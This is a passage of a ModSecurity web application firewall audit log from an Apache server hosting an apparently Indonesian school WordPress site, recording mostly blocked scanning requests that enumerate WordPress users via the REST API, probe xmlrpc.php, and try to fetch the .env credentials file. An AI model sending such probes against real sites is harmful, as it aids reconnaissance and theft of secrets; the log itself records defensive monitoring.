"CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746648555367883 2920 (- - -) Stopwatch2: 1746648555367883 2920; combined=1292, p1=464, p2=798, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --98879d42-Z-- --9d43806f-A-- [08/May/2025:03:45:55 +0700] aBvGg6cs1DvJ_HgMHE_tMwAAAAs 103.236.140.4 32868 103.236.140.4 8181 --9d43806f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.93.157.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.93.157.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9d43806f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d43806f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746650755110663 3464 (- - -) Stopwatch2: 1746650755110663 3464; combined=1421, p1=486, p2=906, p3=0, p4=0, p5=29, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d43806f-Z-- --313de654-A-- [08/May/2025:04:06:11 +0700] aBvLQ6cs1DvJ_HgMHE_usAAAAAo 103.236.140.4 37112 103.236.140.4 8181 --313de654-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --313de654-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --313de654-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746651971147026 2242 (- - -) Stopwatch2: 1746651971147026 2242; combined=1008, p1=356, p2=629, p3=0, p4=0, p5=23, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --313de654-Z-- --3f812329-A-- [08/May/2025:04:06:14 +0700] aBvLRqcs1DvJ_HgMHE_utwAAABI 103.236.140.4 37166 103.236.140.4 8181 --3f812329-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f812329-C-- demo.sayHello --3f812329-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f812329-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746651974443100 4678 (- - -) Stopwatch2: 1746651974443100 4678; combined=3588, p1=441, p2=2944, p3=30, p4=26, p5=83, sr=59, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f812329-Z-- --d80d9d39-A-- [08/May/2025:04:06:18 +0700] aBvLSqcs1DvJ_HgMHE_uwAAAAAs 103.236.140.4 37226 103.236.140.4 8181 --d80d9d39-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.68.155.185 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.68.155.185 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --d80d9d39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d80d9d39-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746651978658515 641 (- - -) Stopwatch2: 1746651978658515 641; combined=267, p1=232, p2=0, p3=0, p4=0, p5=35, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d80d9d39-Z-- --6f044375-A-- [08/May/2025:04:09:17 +0700] aBvL_acs1DvJ_HgMHE_wBgAAAA0 103.236.140.4 38376 103.236.140.4 8181 --6f044375-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6f044375-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f044375-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746652157153508 3093 (- - -) Stopwatch2: 1746652157153508 3093; combined=1348, p1=421, p2=897, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f044375-Z-- --75142378-A-- [08/May/2025:04:09:18 +0700] aBvL_is5rYyn3jlLjjK9GwAAAMM 103.236.140.4 38378 103.236.140.4 8181 --75142378-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --75142378-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75142378-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746652158308190 2379 (- - -) Stopwatch2: 1746652158308190 2379; combined=1053, p1=354, p2=672, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75142378-Z-- --69095442-A-- [08/May/2025:04:09:23 +0700] aBvMAys5rYyn3jlLjjK9HQAAAMg 103.236.140.4 38384 103.236.140.4 8181 --69095442-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --69095442-C-- demo.sayHello --69095442-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --69095442-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746652163628362 5118 (- - -) Stopwatch2: 1746652163628362 5118; combined=3844, p1=441, p2=3170, p3=23, p4=26, p5=105, sr=65, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69095442-Z-- --daa2ef16-A-- [08/May/2025:04:09:23 +0700] aBvMA6cs1DvJ_HgMHE_wCAAAABA 103.236.140.4 38386 103.236.140.4 8181 --daa2ef16-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.179 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --daa2ef16-C-- demo.sayHello --daa2ef16-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --daa2ef16-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746652163921504 4808 (- - -) Stopwatch2: 1746652163921504 4808; combined=3685, p1=421, p2=3057, p3=21, p4=23, p5=94, sr=69, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daa2ef16-Z-- --05c5f858-A-- [08/May/2025:04:09:25 +0700] aBvMBSs5rYyn3jlLjjK9HgAAAMY 103.236.140.4 38390 103.236.140.4 8181 --05c5f858-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --05c5f858-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05c5f858-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746652165716738 2263 (- - -) Stopwatch2: 1746652165716738 2263; combined=1075, p1=326, p2=718, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05c5f858-Z-- --93f8995b-A-- [08/May/2025:04:09:30 +0700] aBvMCis5rYyn3jlLjjK9IQAAAM8 103.236.140.4 38396 103.236.140.4 8181 --93f8995b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.108 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --93f8995b-C-- demo.sayHello --93f8995b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --93f8995b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746652170667676 4651 (- - -) Stopwatch2: 1746652170667676 4651; combined=3680, p1=417, p2=3068, p3=22, p4=25, p5=87, sr=65, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93f8995b-Z-- --4251e001-A-- [08/May/2025:04:09:42 +0700] aBvMFis5rYyn3jlLjjK9IwAAANI 103.236.140.4 38400 103.236.140.4 8181 --4251e001-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4251e001-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4251e001-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746652182684378 3149 (- - -) Stopwatch2: 1746652182684378 3149; combined=1291, p1=421, p2=840, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4251e001-Z-- --47f30f60-A-- [08/May/2025:04:09:46 +0700] aBvMGis5rYyn3jlLjjK9JQAAAMc 103.236.140.4 38404 103.236.140.4 8181 --47f30f60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.145 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --47f30f60-C-- demo.sayHello --47f30f60-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --47f30f60-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746652186398120 5945 (- - -) Stopwatch2: 1746652186398120 5945; combined=4430, p1=558, p2=3650, p3=32, p4=34, p5=93, sr=75, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47f30f60-Z-- --c9b5bf4c-A-- [08/May/2025:04:09:53 +0700] aBvMISs5rYyn3jlLjjK9JgAAAM0 103.236.140.4 38408 103.236.140.4 8181 --c9b5bf4c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c9b5bf4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9b5bf4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746652193022202 2292 (- - -) Stopwatch2: 1746652193022202 2292; combined=1061, p1=335, p2=700, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9b5bf4c-Z-- --84388d7b-A-- [08/May/2025:04:09:57 +0700] aBvMJSs5rYyn3jlLjjK9KAAAANQ 103.236.140.4 38412 103.236.140.4 8181 --84388d7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --84388d7b-C-- demo.sayHello --84388d7b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --84388d7b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746652197691532 4649 (- - -) Stopwatch2: 1746652197691532 4649; combined=3715, p1=425, p2=3093, p3=22, p4=24, p5=89, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84388d7b-Z-- --520f702c-A-- [08/May/2025:04:10:32 +0700] aBvMSCs5rYyn3jlLjjK9KQAAANE 103.236.140.4 38422 103.236.140.4 8181 --520f702c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.47 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --520f702c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --520f702c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746652232719264 3564 (- - -) Stopwatch2: 1746652232719264 3564; combined=1535, p1=468, p2=1030, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --520f702c-Z-- --c2b36e08-A-- [08/May/2025:04:10:37 +0700] aBvMTSs5rYyn3jlLjjK9KwAAAMA 103.236.140.4 38426 103.236.140.4 8181 --c2b36e08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.47 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c2b36e08-C-- demo.sayHello --c2b36e08-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2b36e08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746652237580895 4596 (- - -) Stopwatch2: 1746652237580895 4596; combined=3667, p1=440, p2=3030, p3=22, p4=24, p5=88, sr=65, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2b36e08-Z-- --33137717-A-- [08/May/2025:04:45:27 +0700] aBvUd44K347NtBcwXKwDlgAAAIk 103.236.140.4 38890 103.236.140.4 8181 --33137717-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.102.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.102.18 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --33137717-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33137717-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] 